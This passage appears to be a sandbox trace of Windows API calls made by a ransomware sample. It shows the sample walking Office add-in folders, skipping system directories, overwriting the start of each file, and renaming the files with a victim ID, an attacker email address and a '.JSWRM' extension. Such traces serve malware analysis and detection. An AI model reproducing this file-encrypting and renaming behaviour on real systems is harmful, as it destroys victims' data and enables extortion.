[0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.537] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d578, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d920, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.537] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1525a179, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f891, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.lv.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.537] lstrcmpiW (lpString1="PowerViewRes.lv.xap", lpString2=".") returned 1 [0124.538] lstrcmpiW (lpString1="PowerViewRes.lv.xap", lpString2="..") returned 1 [0124.538] lstrcmpiW (lpString1="PowerViewRes.lv.xap", lpString2="...") returned 1 [0124.538] lstrcmpiW (lpString1="PowerViewRes.lv.xap", lpString2="windows") returned -1 [0124.538] lstrcmpiW (lpString1="PowerViewRes.lv.xap", lpString2="recovery") returned -1 [0124.538] lstrcmpiW (lpString1="PowerViewRes.lv.xap", lpString2="perflogs") returned 1 [0124.538] lstrcmpiW (lpString1="PowerViewRes.lv.xap", lpString2="documents and settings") returned 1 [0124.538] lstrcmpiW (lpString1="PowerViewRes.lv.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.538] lstrcmpiW (lpString1="PowerViewRes.lv.xap", lpString2="system volume information") returned -1 [0124.538] lstrcmpiW (lpString1="PowerViewRes.lv.xap", lpString2="msocache") returned 1 [0124.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.lv.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.lv.xap", cchWideChar=19, lpMultiByteStr=0x240fc0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.lv.xap", lpUsedDefaultChar=0x0) returned 19 [0124.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.lv.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.lv.xap", cchWideChar=19, lpMultiByteStr=0x2412e0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.lv.xap", lpUsedDefaultChar=0x0) returned 19 [0124.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.538] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.538] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lv\\PowerViewRes.lv.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lv\\powerviewres.lv.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.539] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=325777) returned 1 [0124.539] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.539] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.553] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.553] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.553] CloseHandle (hObject=0x338) returned 1 [0124.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0124.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0124.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0124.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.554] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lv\\PowerViewRes.lv.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lv\\powerviewres.lv.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lv\\PowerViewRes.lv.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lv\\powerviewres.lv.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.555] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1525a179, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f891, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.lv.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.555] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0124.556] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42d8c51, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x15f460, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.PowerBI.Diagnostics.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.557] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.dll", lpString2=".") returned 1 [0124.557] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.dll", lpString2="..") returned 1 [0124.557] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.dll", lpString2="...") returned 1 [0124.557] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.dll", lpString2="windows") returned -1 [0124.557] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.dll", lpString2="recovery") returned -1 [0124.557] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.dll", lpString2="perflogs") returned -1 [0124.557] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.dll", lpString2="documents and settings") returned 1 [0124.557] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.557] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.dll", lpString2="system volume information") returned -1 [0124.557] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.dll", lpString2="msocache") returned -1 [0124.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0124.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0124.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.dll", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.dll", lpUsedDefaultChar=0x0) returned 33 [0124.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.dll", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0124.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.dll", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.dll", lpUsedDefaultChar=0x0) returned 33 [0124.557] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1525a179, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1525a179, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167a9331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3fa6c2, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", cAlternateFileName="MICROS~1.XAP")) returned 1 [0124.557] lstrcmpiW (lpString1="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", lpString2=".") returned 1 [0124.557] lstrcmpiW (lpString1="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", lpString2="..") returned 1 [0124.557] lstrcmpiW (lpString1="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", lpString2="...") returned 1 [0124.557] lstrcmpiW (lpString1="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", lpString2="windows") returned -1 [0124.557] lstrcmpiW (lpString1="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", lpString2="recovery") returned -1 [0124.557] lstrcmpiW (lpString1="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", lpString2="perflogs") returned -1 [0124.557] lstrcmpiW (lpString1="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", lpString2="documents and settings") returned 1 [0124.557] lstrcmpiW (lpString1="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.557] lstrcmpiW (lpString1="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", lpString2="system volume information") returned -1 [0124.557] lstrcmpiW (lpString1="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", lpString2="msocache") returned -1 [0124.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0124.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0124.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0124.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", cchWideChar=48, lpMultiByteStr=0x20d920, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", lpUsedDefaultChar=0x0) returned 48 [0124.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0124.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", cchWideChar=48, lpMultiByteStr=0x20dde8, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap", lpUsedDefaultChar=0x0) returned 48 [0124.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1ef7e0 [0124.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\microsoft.reporting.adhoc.shell.bootstrapper.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.559] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4171458) returned 1 [0124.559] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1d8 [0124.559] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0124.574] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.574] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0124.574] CloseHandle (hObject=0x314) returned 1 [0124.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x21bc08 [0124.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.574] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0124.574] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\microsoft.reporting.adhoc.shell.bootstrapper.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\Microsoft.Reporting.AdHoc.Shell.Bootstrapper.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\microsoft.reporting.adhoc.shell.bootstrapper.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.576] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22a9f7a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22a9f7a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22a9f7a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48ac8, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.Reporting.Common.dll", cAlternateFileName="MIB9B1~1.DLL")) returned 1 [0124.576] lstrcmpiW (lpString1="Microsoft.Reporting.Common.dll", lpString2=".") returned 1 [0124.576] lstrcmpiW (lpString1="Microsoft.Reporting.Common.dll", lpString2="..") returned 1 [0124.576] lstrcmpiW (lpString1="Microsoft.Reporting.Common.dll", lpString2="...") returned 1 [0124.576] lstrcmpiW (lpString1="Microsoft.Reporting.Common.dll", lpString2="windows") returned -1 [0124.576] lstrcmpiW (lpString1="Microsoft.Reporting.Common.dll", lpString2="recovery") returned -1 [0124.576] lstrcmpiW (lpString1="Microsoft.Reporting.Common.dll", lpString2="perflogs") returned -1 [0124.576] lstrcmpiW (lpString1="Microsoft.Reporting.Common.dll", lpString2="documents and settings") returned 1 [0124.576] lstrcmpiW (lpString1="Microsoft.Reporting.Common.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.576] lstrcmpiW (lpString1="Microsoft.Reporting.Common.dll", lpString2="system volume information") returned -1 [0124.576] lstrcmpiW (lpString1="Microsoft.Reporting.Common.dll", lpString2="msocache") returned -1 [0124.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Reporting.Common.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0124.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0124.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Reporting.Common.dll", cchWideChar=30, lpMultiByteStr=0x241218, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Reporting.Common.dll", lpUsedDefaultChar=0x0) returned 30 [0124.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Reporting.Common.dll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0124.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0124.576] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Reporting.Common.dll", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Reporting.Common.dll", lpUsedDefaultChar=0x0) returned 30 [0124.576] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x670f8d9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x670f8d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x670f8d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6c478, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", cAlternateFileName="MID48A~1.DLL")) returned 1 [0124.576] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", lpString2=".") returned 1 [0124.576] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", lpString2="..") returned 1 [0124.576] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", lpString2="...") returned 1 [0124.576] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", lpString2="windows") returned -1 [0124.776] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", lpString2="recovery") returned -1 [0124.780] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", lpString2="perflogs") returned -1 [0124.780] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", lpString2="documents and settings") returned 1 [0124.780] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.780] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", lpString2="system volume information") returned -1 [0124.780] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", lpString2="msocache") returned -1 [0124.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0124.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0124.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", cchWideChar=50, lpMultiByteStr=0x20dba8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", lpUsedDefaultChar=0x0) returned 50 [0124.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0124.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0124.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0124.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", cchWideChar=50, lpMultiByteStr=0x20dde8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.dll", lpUsedDefaultChar=0x0) returned 50 [0124.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0124.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x110) returned 0x23dee0 [0124.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0124.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.783] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | 